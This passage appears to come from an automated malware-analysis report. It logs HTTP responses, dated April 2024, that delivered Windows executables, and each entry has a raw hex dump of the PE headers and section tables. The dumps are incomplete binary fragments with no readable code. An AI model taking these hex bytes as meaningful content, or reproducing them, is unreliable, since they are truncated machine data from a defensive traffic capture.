2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 07:04:04 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:10 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:11 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:12 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:13 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:14 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 07:04:15 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 